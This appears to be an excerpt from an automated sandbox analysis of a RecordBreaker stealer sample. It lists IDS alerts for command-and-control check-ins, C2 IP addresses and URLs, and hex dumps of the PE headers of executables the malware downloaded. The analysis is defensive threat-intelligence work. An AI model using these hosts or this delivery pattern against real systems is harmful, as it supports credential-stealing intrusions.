Source: Traffic	Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.4:49695 -> 109.107.173.210:80
Source: Traffic	Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 109.107.173.210:80 -> 192.168.2.4:49695
Source: Traffic	Snort IDS: 2043003 ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591) 192.168.2.4:49696 -> 66.235.200.147:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://109.107.173.210/

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 04 Jan 2023 15:47:23 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:48 GMTETag: "62548404-1f29b8"Expires: Wed, 04 Jan 2023 16:17:23 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 04 Jan 2023 15:47:24 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:42 GMTETag: "625483fe-6db00"Expires: Wed, 04 Jan 2023 16:17:24 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 04 Jan 2023 15:47:24 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 21:52:46 GMTETag: "629299ae-13900"Expires: Wed, 04 Jan 2023 16:17:24 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 04 Jan 2023 15:47:25 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:36 GMTETag: "625483f8-991b8"Expires: Wed, 04 Jan 2023 16:17:25 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 04 Jan 2023 15:47:25 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:40:08 GMTETag: "62548418-a73b8"Expires: Wed, 04 Jan 2023 16:17:25 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 04 Jan 2023 15:47:25 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:58 GMTETag: "6254840e-3e1b8"Expires: Wed, 04 Jan 2023 16:17:25 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 04 Jan 2023 15:47:26 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 17:28:56 GMTETag: "62546558-10c5d7"Expires: Wed, 04 Jan 2023 16:17:26 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00

Source: NtjHIfvQ.exe, 00000026.00000000.418888159.0000000000AC2000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://89.208.137.159:5200/add/
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
